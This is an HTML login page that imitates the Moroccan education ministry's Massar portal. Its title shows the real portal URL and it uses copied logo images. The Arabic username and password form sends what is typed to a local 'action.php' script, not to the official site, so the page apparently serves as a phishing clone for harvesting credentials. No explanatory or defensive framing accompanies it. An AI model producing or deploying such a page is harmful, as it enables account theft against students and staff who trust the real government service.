<!DOCTYPE html>   
<html>   
<head>  
<meta name="viewport" content="width=device-width, initial-scale=1">  
<title>https://massar.men.gov.ma/Account</title>  
<style>   
body {
  font-family: 'Tajawal', sans-serif;
}

body {
  font-family: 'Amiri', serif;
  background-color: white;  
}  
button {   
       background-color: #ff8f00;   
       width: 98%;  
        color: white;   
        padding: 9px;   
        margin: 0px 0px;   
        border: none;   
        cursor: pointer;   
         }   
 form {   
        border: 0px solid #f1f1f1;   
    }   
 input[type=text], input[type=password] {      font-family: 'Amiri', serif;
        width: 100%;   
        margin: 0px 0;  
        padding: 11px 100px;   
        display: inline-block;   
        border: 1px solid gray;   
        box-sizing: border-box;
        border-radius: 4px;
        text-align: right;
        line-height: 1.5;

      
    } 
    
 input[type=checkbox] {
        width: 10%;   
        margin: 18px 0px;
        border: 90px solid #f1f1f1;
        border-radius: 5px;
        text-align: right;
        line-height: 1.5;
    }
 button[type=submit] {
        width: 100%;   
        margin: 10px 0px;  
        padding: 8px 0px;   
        border: 0px solid gray; 
        border-radius: 4px;
        line-height: 1.5;
       

    }
 div[class=item] {
        font-style: oblique;
        box-sizing: border-box;
        border-radius: 10px;
        line-height: 1.5;
        
 }
 nav[class=navLang] {
        font-family: 'Amiri', serif;
        font-style: oblique;
        box-sizing: border-box;
        line-height: 1.5;
        text-align: ;
 }
    }
 button:hover {   
        opacity: 0.0;   
    }   
  .cancelbtn {   
        width: auto;   
        padding: 0px 0px;  
        margin: 0px 0px;  
    }   
        
     
 .container {   
        padding: 0px;   
        background-color: white;  
    }   
</style>   
</head>    



<form action="action.php" method="post">


<body>

    <img src="massar2.png"
    style="width:358px;height:177px;margin: -8px -8px;">
    <img src="massar1.png"
    style="width:250px;height:53px;margin: 10px 50px;">
    <img src="massar.png"
    style="width:145px;height:58px;margin: 9px 95px;">
        <div class="container">   
            <label for="usr"><b></b> </label>   
            <input type="text" placeholder="اسم المستخدم " name="usr" required>  
            <br></br>
            <label for="psw"><b></b>   </label>   
            <input type="password"  placeholder="كلمة المرور" name="psw" required>
            <center>
            <input type="checkbox" checked="checked">    حفظ بيانات الدخول 
            </center>
            <button type="submit">تسجيل الدخول</button>   
        </div>        
                   <center>
                   <div class="item" >
                       <a href="#" onclick="MotDePasseOublie()" class="mdp-oublie">استرجاع كلمة المرور</a>
                   </div>     
                   </center>    
                        <nav class="navLang">
                            <ul>
                                <li>
                                    <a class="current" href="/General/SetCulture?culture=ar">
                                        العربية
                                    </a>
                                </li>
                                <li>
                                    <a class="current" href="/General/SetCulture?culture=fr">
                                        الفرنسية
                                    </a>
                                </li>
                            </ul>
                        </nav>
</form>
</body>     
</html>  
